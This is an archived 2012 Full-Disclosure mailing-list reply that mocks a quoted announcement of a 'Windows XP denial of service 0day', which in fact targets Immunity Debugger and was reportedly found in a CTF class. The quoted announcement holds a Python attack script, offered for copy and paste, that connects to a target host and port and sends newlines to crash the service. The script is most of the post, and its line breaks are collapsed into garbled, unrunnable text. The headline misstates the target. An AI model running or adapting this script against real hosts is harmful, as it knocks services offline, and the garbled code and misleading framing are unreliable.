lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 17 Apr 2012 08:26:25 -0400
From: "Justin C. Klein Keane" <justin@...irish.net>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP denial of service 0day found in
 CTF exercise

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Windows XP denial of service 0day found in CTF exercise

Oof, this is almost as bad as that BackTrack 0 day released the other
day
(http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/).
 Any response from Microsoft yet?

Justin C. Klein Keane
http://www.MadIrish.net

The PGP signature on this email can be verified using the public key at
http://www.madirish.net/gpgkey

On 04/17/2012 02:48 AM, Adam Behnke wrote:
> Immunity Debugger Remote Denial of Service 0Day Tested against
> version 1.76 and 1.80 on Windows XP distributions
> 
> Has not been tested for potential privilege escalation vectors.
> 
> We first wrote about Immunity Debugger here:
> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>
>  Discovered by a student that wishes to remain anonymous in the
> course CTF. This 0day exploit for Windows was discovered by a
> student in the InfoSec Institute Ethical Hacking class, during an
> evening CTF exercise. The student wishes to remain anonymous, he
> has contributed a python version of the 0day. A patch that can be
> applied to Windows has not been made available. You can find a
> python version of the exploit to copy and paste here:
> 
> 
> #!/usr/bin/python #Windows XP denial of service 0day exploit
> discovered on 4.9.12 by InfoSec Institute student #For full write
> up and description go to
> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>
> 
import sys
> import os import time import getopt import socket
> 
> class Error(Exception): def __init__(self, error): 
> self.errorStr=error  def __str__(self): return repr(self.errorStr)
> 
> class Exploit():
> 
> def __init__(self, targetHost, targetPort): self.targetHost =
> targetHost
> 
> def exploit(self, targetHost, targetPort):
> 
> try: socket.inet_aton(targetHost) s =
> socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
> s.connect((targetHost,targetPort)) except socket.error: raise
> Error("Unable to exploit (Connect failed.)") sys.exit(0)
> 
> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort)) 
> except: raise Error("Unable to exploit (Exploit failed.)") 
> 
> def usage(): print "[!] Usage:" print "	( -h, --help ):" print "
> Print this message." print "	( --targetHost= ): Target host." print
> "		--targetHost=127.0.0.1" print "	( --targetPort= ): Target
> port." print "		--targetPort=8888"
> 
> def main(): print "[$] Windows XP 0Day" try: opts, args =
> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
> "targetPort="]) except getopt.GetoptError, err: # Print help
> information and exit: print '[!] Parameter error:' + str(err) #
> Will print something like "option -a not recognized" usage() 
> sys.exit(0)
> 
> targetHost=None targetPort=None  for opt, arg in opts: if opt in
> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost": 
> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
> would be assuming to say we'll never get here. print "[!] Parameter
> error." usage() sys.exit(0)  if not targetHost: print "[!]
> Parameter error: targetHost not set." usage() sys.exit(0)
> 
> if not targetPort: print "[!] Parameter error: targetPort not
> set." usage() sys.exit(0)
> 
> exploit = Exploit(targetHost, targetPort)
> 
> print "[*] Attempting to exploit:"  try: 
> exploit.exploit(targetHost, int(targetPort)) except Error as
> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0) 
> print "[*] Exploit appears to have worked."
> 
> # Standard boilerplate to call the main() function to begin # the
> program. if __name__=='__main__': main()
> 
> 
> 
> _______________________________________________ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iPwEAQECAAYFAk+NYXEACgkQkSlsbLsN1gBiggb/efTTww5szr9rcI+NbsUzybuk
rhPyvj99VJMMVCUjHrDrWKXQeTD/rrorY3SYMIGNlHzVWgqkiswM5N16Fy9MvqIH
2Cc8aJ5kh2xi9vtlCHlPZ7XJeN3tPEL+8/qOVbT7I2CNeD8JJseVfcJwnoEyyumm
SZYmoxjJriMT7IAXysHJudaF294DvC+z6drvF+ou8wnVcIB0nkXoCVNsbcDK9dwS
R4f0a+QYN1tXM7+8za6/VznbDwcqw/amqeS3V883lqlt0XCHx5zIh+VxG0qvB5Ui
EPjoh3P/OEMP7PYRozM=
=y+j6
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ